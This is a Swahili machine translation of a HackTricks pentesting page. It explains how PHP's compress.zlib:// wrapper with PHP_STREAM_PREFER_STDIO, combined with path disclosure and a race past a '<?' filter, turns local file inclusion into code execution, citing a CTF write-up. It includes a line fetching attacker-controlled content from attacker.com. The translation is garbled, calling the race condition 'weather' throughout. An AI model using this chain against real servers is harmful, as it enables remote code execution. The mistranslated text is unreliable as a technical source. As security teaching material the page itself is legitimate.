hacktricks/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
2024-02-11 02:13:58 +00:00

4.2 KiB

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

compress.zlib:// na PHP_STREAM_PREFER_STDIO

Faili iliyofunguliwa kwa kutumia itifaki ya compress.zlib:// na bendera ya PHP_STREAM_PREFER_STDIO inaweza kuendelea kuandika data ambayo inawasili kwenye uhusiano baadaye kwenye faili hiyo hiyo.

Hii inamaanisha kwamba wito kama huu:

file_get_contents("compress.zlib://http://attacker.com/file")

Nitatumia ombi la kuuliza http://attacker.com/file, kisha seva inaweza kujibu ombi hilo na jibu sahihi la HTTP, kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo itaandikwa pia kwenye faili.

Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:

/* Use a tmpfile and copy the old streams contents into it */

if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}

Mashindano ya Hali ya Hewa hadi RCE

CTF hii ilishindwa kwa kutumia mbinu ya awali.

Mshambuliaji atafanya seva ya mwathiriwa ifungue uhusiano kusoma faili kutoka kwenye seva ya mshambuliaji kwa kutumia itifaki ya compress.zlib.

Wakati huu uhusiano ukiwepo, mshambuliaji atafanya uchunguzi wa njia ya faili ya muda iliyoundwa (inavuja na seva).

Wakati uhusiano bado uko wazi, mshambuliaji atatumia LFI kuweka faili ya muda ambayo anadhibiti.

Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao unazuia kupakia faili zinazotumia <?. Kwa hivyo, mshambuliaji atatumia Hali ya Hewa. Katika uhusiano ambao bado uko wazi, mshambuliaji atatuma mzigo wa PHP BAADA YA seva ya wavuti kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini KABLA haijapakia maudhui yake.

Kwa habari zaidi angalia maelezo ya Hali ya Hewa na CTF katika https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: